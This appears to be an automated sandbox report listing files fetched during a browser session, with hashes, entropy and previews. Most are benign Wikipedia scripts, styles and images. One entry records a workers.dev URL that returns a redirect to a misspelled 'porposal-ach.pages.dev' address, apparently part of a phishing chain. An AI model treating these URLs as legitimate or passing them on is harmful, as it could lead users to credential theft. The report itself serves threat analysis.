                                                                                                                                                                                                                                    SHA-512:1E587252C34AE2BB377631D23436F018649063A03557E7A09D3AC1FF200084AC1D46B8F6E994C065CAD4ABD5B3DD9D0BC3D733DDC43ECBF93F856202A2CCB6B1
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/static/images/icons/wikipedia.png
                                                                                                                                                                                                                                    Preview:.PNG........IHDR...d...d.....p.T....gAMA......a...4;IDATx...T[]..._.......SwW...{.;E#D J....C.......}n.M...q.Z.&......s/..1~.....1~....m....x...r..>....._.../.......gg./..W...*.U../...b......N[[.9..C.m.g|~..j+'U........q.<)3..999...xyNnA 7...z..kKp..A.Z.........Woo..uu....Q_..jhl...BRku.....BQ..}...hi1[l/Z..d......]Je....('7.2.s.(.....I..rr....X2f?....%......3g..>...F3e......I@.+.n..WW..mmm.57.<........2.L....0......mvGZY.#.py.......*w.....R..V[.g.J3..@.DFf..).htQQ.jM .P..TA.O.4.<.......l0x.......t!DSs....Q...b.F...i,q.\..B...NL....l6....F.....\.v{...g0q......k.[YC..Jr..E.@v..l...RRjz.X.{.B.t%....R.."e1....@.R....H..C}y` 0...?......')...&k(.6.:.K.9.H.*~.n...Hc.Z].US{..,J[[.y<.*..l...X.J.........B.4TW.H..l.N|.E.85... .r.K..n..E.f...q.l.r.sF..E../2.......<.....f.Z........C==~.Y.. ......4>..@.k....a0.............-....jk..6...".(.UpIe%.#...-^r.!v...2[T..q+i.]4u.......w4.O.h...0..5...,...@_....B....Gi..md/.S8...o.....d&..V........;;..p(.........
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4499)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):22854
                                                                                                                                                                                                                                    Entropy (8bit):5.371142534045146
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:vnqx9BVqIPt6+3sdygsOarP1UFWq7yKiadWpu5gx3FF4z8nzZf/y9eqNUb:vqx9BoCnsAgDaRUgq7pdiu5glz4AnzZT
                                                                                                                                                                                                                                    MD5:C325B04E1759A82399F0FA06446ECB62
                                                                                                                                                                                                                                    SHA1:C0D74B9FE4B71A9B672F735FA1D3CF09112D81A5
                                                                                                                                                                                                                                    SHA-256:AE5CDE57FC38F15D6B68C6121D0B56455C6D62E9FB78B131FF10249127286EB1
                                                                                                                                                                                                                                    SHA-512:D6BB35A0485FA76AE835AE84732AAECC681008CAB2150302B018BE92C475AB254FBC37EA12AC725DAEA7CA74ED20419E37A7CA73DAC0D1E0F14381990F588319
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/w/load.php?lang=en&modules=ext.gadget.ReferenceTooltips%2Cswitcher&skin=vector-2022&version=12u7u
                                                                                                                                                                                                                                    Preview:mw.loader.impl(function(){return["ext.gadget.ReferenceTooltips@1fceb",function($,jQuery,require,module){(function(){var REF_LINK_SELECTOR=window.rt_REF_LINK_SELECTOR||'.reference, a[href^="#CITEREF"]',COMMENTED_TEXT_CLASS=window.rt_COMMENTED_TEXT_CLASS||'rt-commentedText',COMMENTED_TEXT_SELECTOR=(window.rt_COMMENTED_TEXT_SELECTOR||(COMMENTED_TEXT_CLASS?'.'+COMMENTED_TEXT_CLASS+', ':'')+'abbr[title]');if(mw.messages.get('rt-settings')===null){mw.messages.set({'rt-settings':'Reference Tooltips settings','rt-enable-footer':'Enable Reference Tooltips','rt-settings-title':'Reference Tooltips','rt-save':'Save','rt-enable':'Enable Reference Tooltips','rt-activationMethod':'Show a tooltip when I\'m','rt-hovering':'hovering a reference','rt-clicking':'clicking a reference','rt-delay':'Delay before the tooltip appears (in milliseconds)','rt-tooltipsForComments':'Show the tooltip over <span title="Tooltip example" class="'+(COMMENTED_TEXT_CLASS||'rt-commentedText')+.'" style="border-bottom: 1px d
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17570)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):122202
                                                                                                                                                                                                                                    Entropy (8bit):5.413333342470304
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:y2WUK8xo4/78d964c6W1/ASsB5CLrIbh5fruJXHTg+8/iwCzhgXcREaCq/6/sOSd:O7ATg+qlXcVCRsO8JAgOGSytuCv
                                                                                                                                                                                                                                    MD5:1B58BBEE8C5ABFFAFADE020A55835CDF
                                                                                                                                                                                                                                    SHA1:44CEA44DDC7D5C8BD4AFA180DC3EDC5E353CB791
                                                                                                                                                                                                                                    SHA-256:4BF57A88662F0E53AD4A7A26F03E45E1065EDB00E4C8DC06575119EC025E7577
                                                                                                                                                                                                                                    SHA-512:09EFC752BD14B487C578C61AF7EB0FDFB7214A85F6ED6C3B32A20BDCE302A5A1A2C82151A8509AECE579F857D5BBFE01AF75A94E0F6686798FC5CA8A8E5700C6
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:mw.loader.impl(function(){return["ext.cite.referencePreviews@10d1c",{"main":"index.js","files":{"index.js":function(require,module,exports){const isReferencePreviewsEnabled=require('./isReferencePreviewsEnabled.js');const{initReferencePreviewsInstrumentation,LOGGING_SCHEMA}=require('./referencePreviewsInstrumentation.js');const createReferenceGateway=require('./createReferenceGateway.js');const renderFn=require('./createReferencePreview.js');const{TYPE_REFERENCE,FETCH_DELAY_REFERENCE_TYPE}=require('./constants.js');const referencePreviewsState=isReferencePreviewsEnabled(mw.user,mw.popups.isEnabled,mw.config);const gateway=createReferenceGateway();mw.config.set('wgCiteReferencePreviewsVisible',!!referencePreviewsState);mw.trackSubscribe('Popups.SettingChange',(data)=>{if(data.previewType===TYPE_REFERENCE){mw.track(LOGGING_SCHEMA,data);}});module.exports=referencePreviewsState!==null?{type:TYPE_REFERENCE,selector:'#mw-content-text .reference a[ href*="#" ]',delay:FETCH_DELAY_REFERENCE_TY
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (1471)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):147990
                                                                                                                                                                                                                                    Entropy (8bit):5.411713732342445
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:yLWwbnGhdWXjSv4Xa53AhY4lRgH28XEZ/CVLhuBkoPEJAk95s/cVWKn+IiFiWH/1:yUv4Kyh4HHNVQBkRrvM+bW
                                                                                                                                                                                                                                    MD5:006B13E3AC151D033198538013E523A1
                                                                                                                                                                                                                                    SHA1:A50AAF971F68234497BCC79AA576F9C23AB80EB5
                                                                                                                                                                                                                                    SHA-256:C1E928D5F5A1409C09E8F47A4125511957CFDCE0812411631A117F54492491F9
                                                                                                                                                                                                                                    SHA-512:4B44E560DA5D513864042B7EAAA71F89A9E1151FD0F885506C60D5FA4ECA6130F3168946B302A9C86BFA995DF8D73E9C8CBF8B86F8E007BF7C297B6F91018CFD
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:mw.loader.impl(function(){return["mmv@lw86i",{"main":"mmv/mmv.js","files":{"mmv/config.json":{"useThumbnailGuessing":true,"thumbnailBucketSizes":[320,800,1024,1280,1920,2560,2880],"imageQueryParameter":false,"recordVirtualViewBeaconURI":"/beacon/media","extensions":{"djvu":"default","jpg":"default","jpeg":"default","gif":"default","svg":"default","png":"default","tiff":"default","tif":"default","webp":"default","stl":"mmv.3d"}},"mmv/mmv.js":function(require,module,exports){const{Config}=require('mmv.bootstrap');const HtmlUtils=require('./mmv.HtmlUtils.js');const ViewLogger=require('./logging/mmv.logging.ViewLogger.js');const Api=require('./provider/mmv.provider.Api.js');const GuessedThumbnailInfo=require('./provider/mmv.provider.GuessedThumbnailInfo.js');const ImageProvider=require('./provider/mmv.provider.Image.js');const ImageInfo=require('./provider/mmv.provider.ImageInfo.js');const ThumbnailInfo=require('./provider/mmv.provider.ThumbnailInfo.js');const ImageModel=require('./model/m
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                                                                    Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (7407), with no line terminators
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):7407
                                                                                                                                                                                                                                    Entropy (8bit):5.105650984588021
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:9s3zs3ATM5dVE7AIFLei1KoaqF6Wvgtiy9g/:JXDcV1aqFBD
                                                                                                                                                                                                                                    MD5:7A850FCB8C66471BF3209410027C46FA
                                                                                                                                                                                                                                    SHA1:C0629A4F4977FB2CDFEDCF4FEB2D68CB929332F8
                                                                                                                                                                                                                                    SHA-256:502DC6C5BE8ACDCE1554D427354E7ABEB3435D06BDE37B530407332748466778
                                                                                                                                                                                                                                    SHA-512:BBC46828B09EB27CD00DF95F51D2B12A0FDA79D69C0A4302D7732AD32B94BC867F7E7BF15E8EBA981CC482C8617DDEED9A47B68E1F2A59E656A042908D77C59D
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/w/load.php?lang=en&modules=site.styles&only=styles&skin=vector-2022
                                                                                                                                                                                                                                    Preview:cite,dfn{font-style:inherit}q{quotes:'"' '"' "'" "'"}blockquote{overflow:hidden;margin:1em 0;padding:0 40px}small{font-size:85%}.mw-body-content sub,.mw-body-content sup{font-size:80%}.ns-talk .mw-body-content dd{margin-top:0.4em;margin-bottom:0.4em}.client-js .collapsible:not(.mw-made-collapsible).collapsed > tbody > tr:not(:first-child),.client-js .outercollapse .innercollapse.mw-collapsible:not(.mw-made-collapsible) > p,.client-js .outercollapse .innercollapse.mw-collapsible:not(.mw-made-collapsible) > table,.client-js .outercollapse .innercollapse.mw-collapsible:not(.mw-made-collapsible) > thead + tbody,.client-js .outercollapse .innercollapse.mw-collapsible:not(.mw-made-collapsible) tr:not(:first-child),.client-js .outercollapse .innercollapse.mw-collapsible:not(.mw-made-collapsible) .mw-collapsible-content,#editpage-specialchars{display:none}.references{margin-bottom:0.5em}span[rel="mw:referencedBy"]{counter-reset:mw-ref-linkback 0}span[rel='mw:referencedBy'] > a::before{content:
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):74
                                                                                                                                                                                                                                    Entropy (8bit):4.306417585383312
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:YWR4buWsItRRVljEKZVEDM2HAQz:YWybuORp4KZAgQz
                                                                                                                                                                                                                                    MD5:AB3F8C64531F38E70348047A6F4DF1BD
                                                                                                                                                                                                                                    SHA1:8AFCA69160C51EDE57921A8EF76481D6FF1C7835
                                                                                                                                                                                                                                    SHA-256:586D9DD959D197BFD0EDF6DB401789E79E183AF389C09A97BA8036CFF5270CDC
                                                                                                                                                                                                                                    SHA-512:69C813CF835EB6D1138AE9C14C8A2A6B588009C29D6AD3EBBC32F27907839E543F6E792518D16683CD2A29CBE4BDE0873010B30A1A45F5D3E492577C609130A7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://tiny-hat-eab8.pagenew.workers.dev/
                                                                                                                                                                                                                                    Preview:{"status":"success","message":"https://porposal-ach.pages.dev/#?service="}
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):87533
                                                                                                                                                                                                                                    Entropy (8bit):5.262536918435756
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKr:sHNwcv9VBQpLl88SMBQ47GKr
                                                                                                                                                                                                                                    MD5:2C872DBE60F4BA70FB85356113D8B35E
                                                                                                                                                                                                                                    SHA1:EE48592D1FFF952FCF06CE0B666ED4785493AFDC
                                                                                                                                                                                                                                    SHA-256:FC9A93DD241F6B045CBFF0481CF4E1901BECD0E12FB45166A8F17F95823F0B1A
                                                                                                                                                                                                                                    SHA-512:BF6089ED4698CB8270A8B0C8AD9508FF886A7A842278E98064D5C1790CA3A36D5D69D9F047EF196882554FC104DA2C88EB5395F1EE8CF0F3F6FF8869408350FE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1189)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):816035
                                                                                                                                                                                                                                    Entropy (8bit):5.526350296129341
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:uV0OrEx7lh7nPdcZ8h8qRdjiZ5B30hf7k1Cuad:uV0OrEx7lh7nPdcZ8h8qRdjiZ5d0hfIs
                                                                                                                                                                                                                                    MD5:511F5694712BA1B95D9E0D03E7BCBFB9
                                                                                                                                                                                                                                    SHA1:27AB58B376849D41163C12FCF31246641B74C901
                                                                                                                                                                                                                                    SHA-256:06DFC6D8B941853F5DF7838CF70F15592586E6826189D02CE70929C7F4300D0A
                                                                                                                                                                                                                                    SHA-512:2CC7A2CB0844850E61D7F7FE32C478C2B9FAD3238D550E5EE39863BCD11CBC774A4F29A687C70173646D0350DA4E0F7BE4A11452D9DB225E91E7A68B73337FFB
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/w/load.php?lang=en&modules=ext.centralNotice.choiceData%2Cdisplay%2CgeoIP%2CimpressionDiet%2CkvStore%2ClegacySupport%2CstartUp%7Cext.centralauth.ForeignApi%2Ccentralautologin%7Cext.checkUser.clientHints%7Cext.cite.ux-enhancements%7Cext.cx.eventlogging.campaigns%7Cext.cx.model%7Cext.cx.uls.quick.actions%7Cext.echo.centralauth%7Cext.eventLogging%2CnavigationTiming%2Cpopups%2CwikimediaEvents%7Cext.growthExperiments.SuggestedEditSession%7Cext.uls.common%2Cinterface%2Cpreferences%2Cwebfonts%7Cext.urlShortener.toolbar%7Cjquery%2Coojs%2Csite%7Cjquery.client%2CmakeCollapsible%2CtextSelection%7Cjquery.uls.data%7Cmediawiki.ForeignApi%2CString%2CTitle%2CUri%2Capi%2Cbase%2Ccldr%2Ccookie%2Cexperiments%2CjqueryMsg%2Clanguage%2Crouter%2Cstorage%2Ctoc%2Cuser%2Cutil%2CvisibleTimeout%7Cmediawiki.ForeignApi.core%7Cmediawiki.editfont.styles%7Cmediawiki.libs.pluralruleparser%7Cmediawiki.page.ready%7Cmediawiki.page.watch.ajax%7Cmmv.bootstrap%2Ccodex%7Cmw.cx.SiteMapper%7Coojs-ui.styles.icons-interactions%7Cskins.vector.clientPreferences%2Cjs%7Cskins.vector.icons.js%7Cwikibase.client.vector-2022&skin=vector-2022&version=5bkcg
                                                                                                                                                                                                                                    Preview:mw.loader.impl(function(){return["ext.centralNotice.choiceData@a0yhu",function($,jQuery,require,module){mw.centralNotice=(mw.centralNotice||{});mw.centralNotice.choiceData=[{"name":"C24_WMDE_Desktop_EN_ty","start":1735822800,"end":1736982000,"preferred":2,"throttle":100,"bucket_count":2,"geotargeted":true,"type":null,"banners":[{"name":"B24_WMDE_Desktop_EN_ty_ctrl","bucket":0,"weight":25,"category":"fundraising","display_anon":true,"display_account":false,"devices":["desktop"]},{"name":"B24_WMDE_Desktop_EN_ty_var","bucket":1,"weight":25,"category":"fundraising","display_anon":true,"display_account":false,"devices":["desktop"]}],"countries":["DE"],"mixins":{"impressionDiet":{"cookieName":"wmde-thankyou-2024","maximumSeen":4,"restartCycleDelay":0,"skipInitial":0},"legacySupport":{"bannersNotGuaranteedToDisplay":true,"setSRISampleRate":true,"sriSampleRate":1}},"regions":[]},{"name":"C24_WMDE_Mobile_EN_ty","start":1735822800,"end":1736982000,"preferred":2,"throttle":100,"bucket_count":2,"g
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):268
                                                                                                                                                                                                                                    Entropy (8bit):4.814615653975803
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:vFWWMNHU8LdgCfWGKsqDmJS4RKb5zMcFH3AMO+lHpkKcvXvxcAoPRGHGVPtfIg3W:TMVBd/i9mc4slzTQol80QoAgNYx
                                                                                                                                                                                                                                    MD5:20E2BF3F38E766E007DFD18D33E9FB41
                                                                                                                                                                                                                                    SHA1:BC1D4BC3D10C2BFCCADBF7109F760550CE5FA1A6
                                                                                                                                                                                                                                    SHA-256:65829329CB8D2D9C79A1C427ABB906E0841FCB1A833840598150559F87CC1902
                                                                                                                                                                                                                                    SHA-512:EE2051285A05849F4BAAFBD4CBBDDE802DAA281C20D96CBF2D8C4E5B80D7C2A9123BB0D0DDCAB097DC45779C784537B998E6080DB4FEDDE34C23CDA34605352F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>...ellipsis..</title><g fill="#000"><circle cx="10" cy="10" r="2"/><circle cx="3" cy="10" r="2"/><circle cx="17" cy="10" r="2"/></g></svg>.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):13444
                                                                                                                                                                                                                                    Entropy (8bit):7.976143367474683
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:u7Ve2153JRSTNW3lr/VRL/q6rF7AIZjQgtw:cVONW15B/q6rFBjQgtw
                                                                                                                                                                                                                                    MD5:C2BC34648C583E6B9959C60BF51A4EFF
                                                                                                                                                                                                                                    SHA1:7FE85A21E9246C62CDB3845DBF06642EA5540E59
                                                                                                                                                                                                                                    SHA-256:94F7729893505B73B9360F51C67074CF44D31A096F25088699CA290FA39CCED0
                                                                                                                                                                                                                                    SHA-512:1E587252C34AE2BB377631D23436F018649063A03557E7A09D3AC1FF200084AC1D46B8F6E994C065CAD4ABD5B3DD9D0BC3D733DDC43ECBF93F856202A2CCB6B1
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR...d...d.....p.T....gAMA......a...4;IDATx...T[]..._.......SwW...{.;E#D J....C.......}n.M...q.Z.&......s/..1~.....1~....m....x...r..>....._.../.......gg./..W...*.U../...b......N[[.9..C.m.g|~..j+'U........q.<)3..999...xyNnA 7...z..kKp..A.Z.........Woo..uu....Q_..jhl...BRku.....BQ..}...hi1[l/Z..d......]Je....('7.2.s.(.....I..rr....X2f?....%......3g..>...F3e......I@.+.n..WW..mmm.57.<........2.L....0......mvGZY.#.py.......*w.....R..V[.g.J3..@.DFf..).htQQ.jM .P..TA.O.4.<.......l0x.......t!DSs....Q...b.F...i,q.\..B...NL....l6....F.....\.v{...g0q......k.[YC..Jr..E.@v..l...RRjz.X.{.B.t%....R.."e1....@.R....H..C}y` 0...?......')...&k(.6.:.K.9.H.*~.n...Hc.Z].US{..,J[[.y<.*..l...X.J.........B.4TW.H..l.N|.E.85... .r.K..n..E.f...q.l.r.sF..E../2.......<.....f.Z........C==~.Y.. ......4>..@.k....a0.............-....jk..6...".(.UpIe%.#...-^r.!v...2[T..q+i.]4u.......w4.O.h...0..5...,...@_....B....Gi..md/.S8...o.....d&..V........;;..p(.........
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2163
                                                                                                                                                                                                                                    Entropy (8bit):4.9588361826047835
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:YokEcFFFJrvOs+vka6u9U1eBFJBFakBFuePFzvBFoDFYxBFuvPF/3hcm3hcm:EEitPv6qaUCmCm
                                                                                                                                                                                                                                    MD5:AD8A1165CC42C38A729CE916F570921B
                                                                                                                                                                                                                                    SHA1:3173504C78579E8252D0B12B36787B256D5179C3
                                                                                                                                                                                                                                    SHA-256:B3915F4D7FC80A054ADDB68E70FEC4BC8425EAD4D7EA9616BB236991CD6D34BD
                                                                                                                                                                                                                                    SHA-512:D9049A61BB8485F8DBE2DBB90941CF4263462ED2056E7E18C074FA2DF124C426B1B35152A794C76AAD64A699F2C0FA4079BD84865B974BAC40312C3C30AF63DB
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:{"type":"standard","title":"Software release life cycle","displaytitle":"<span class=\"mw-page-title-main\">Software release life cycle</span>","namespace":{"id":0,"text":""},"wikibase_item":"Q1211457","titles":{"canonical":"Software_release_life_cycle","normalized":"Software release life cycle","display":"<span class=\"mw-page-title-main\">Software release life cycle</span>"},"pageid":220901,"thumbnail":{"source":"https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/Software_dev2.svg/320px-Software_dev2.svg.png","width":320,"height":677},"originalimage":{"source":"https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/Software_dev2.svg/300px-Software_dev2.svg.png","width":300,"height":635},"lang":"en","dir":"ltr","revision":"1265702247","tid":"217a7dc9-c4e5-11ef-86e5-29f7e1e77427","timestamp":"2024-12-28T06:29:46Z","description":"Stages in creation of computer software","description_source":"local","content_urls":{"desktop":{"page":"https://en.wikipedia.org/wiki/Software_relea
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1000)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):62904
                                                                                                                                                                                                                                    Entropy (8bit):5.342135589333572
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:0FbC0R9xE75OmcLBbkfJAsxA/t/i8un8kgERi0u7o:0FbC0uImobknA/LG
                                                                                                                                                                                                                                    MD5:0222A839CF9F37A28DCA1A0351D3A6F1
                                                                                                                                                                                                                                    SHA1:F21264DDD960870661EF833A93C1FEFF2FDE9878
                                                                                                                                                                                                                                    SHA-256:5C20C307FBBE24F3064B02768FA63994C013CACEDCEA6FEAB311CD7A1FD1B4DC
                                                                                                                                                                                                                                    SHA-512:7FC7B8C3FFF0B2DEA651BDF862F7826BA01F23355ADE9F306D51DC4DA092E1A26B94BDD9B4D98F46AB26735849FA0B7B0E94F4FCE2B5B8065BD552A13AE5CDF2
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/w/load.php?lang=en&modules=startup&only=scripts&raw=1&skin=vector-2022
                                                                                                                                                                                                                                    Preview:function isCompatible(){return!!('querySelector'in document&&'localStorage'in window&&typeof Promise==='function'&&Promise.prototype['finally']&&(function(){try{new Function('(a = 0) => a');return true;}catch(e){return false;}}())&&/./g.flags==='g');}if(!isCompatible()){document.documentElement.className=document.documentElement.className.replace(/(^|\s)client-js(\s|$)/,'$1client-nojs$2');while(window.NORLQ&&NORLQ[0]){NORLQ.shift()();}NORLQ={push:function(fn){fn();}};RLQ={push:function(){}};}else{if(window.performance&&performance.mark){performance.mark('mwStartup');}(function(){'use strict';var con=window.console;function Map(){this.values=Object.create(null);}Map.prototype={constructor:Map,get:function(selection,fallback){if(arguments.length<2){fallback=null;}if(typeof selection==='string'){return selection in this.values?this.values[selection]:fallback;}var results;if(Array.isArray(selection)){results={};for(var i=0;i<selection.length;i++){if(typeof selection[i]==='string'){results[
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 135 x 155, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):7951
                                                                                                                                                                                                                                    Entropy (8bit):7.933776057154196
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:+98K0ssoez4u3fSWeN0vFAeJteKmcx+W00gWYVoB2mNgxZp:+dSohISWe6FbpV00gW0pxj
                                                                                                                                                                                                                                    MD5:814092D761989C74620EB311F2C71B9D
                                                                                                                                                                                                                                    SHA1:E6F58AAEC8F31EB222F9E10FA9E9F64B79AE888C
                                                                                                                                                                                                                                    SHA-256:4A702E2EDA9F4D04325A90088FBE04003D335B09A2F62AB52A05BD6B4441208E
                                                                                                                                                                                                                                    SHA-512:9E7869BC5C466D5EFBA51FB10B6C10443AA74D71EEEA671EDBBD1DB73E3D842B574A24AB48C267221D3BF20EAB77EF27CDDB0A4717AB5075942A7D02998AB138
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/static/images/project-logos/enwiki.png
                                                                                                                                                                                                                                    Preview:.PNG........IHDR..............-x.....PLTEGpL..............WWW......................SSS..........................<<?.......................................TRTXVW...............a`a.........................^^^.........oop......nnoxyz{{{.....TTTWWX.........rss...lll..........................................................................................................................................................................hgh...[Z[...................kkk.................._]^......3/1...=::..............................yxy.....||}...KII...ONO.....................EBC.................................nmn...ede845.........rqs.......................................................................................................................vuv......................|....tRNS.5..V....4G".......n........r..r\..i....F.............-_.....|....D....\.........6.>../f.n.a...N.........CV...[~s.w..*H$....{i.....u..r-...;IDATx^..N.@...Z+..)F......SX.q...~.$.w.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 200 x 37, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3058
                                                                                                                                                                                                                                    Entropy (8bit):7.263497071422769
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:5d+zJm00izqzuwFhJN1/yO7zO0zAUvkXOi4uyTAHcAoYnTyaFOBvqOlF6u+lM4PY:5dEwFhvgOvvrTgHo+yf18u+TmLxk6
                                                                                                                                                                                                                                    MD5:D6B7124F1B76FE64612BBB2122055D94
                                                                                                                                                                                                                                    SHA1:824847C8DDC8924396BC3069D325A60358EA628D
                                                                                                                                                                                                                                    SHA-256:8DA6EBA17B55754CD495E37CEC1F6006A5395302E82B45CA2773C766FE0EB8DD
                                                                                                                                                                                                                                    SHA-512:D8DDCA4D256FB2BA38CB96D03CF742B244F6BAB6BFE0E5993C722AE1F8D6122CC628D17B6C05B0F38BB10508820ADCFEFCBC9C3C4A52E1405886802412A58F03
                                                                                                                                                                                                                                    Malicious:false
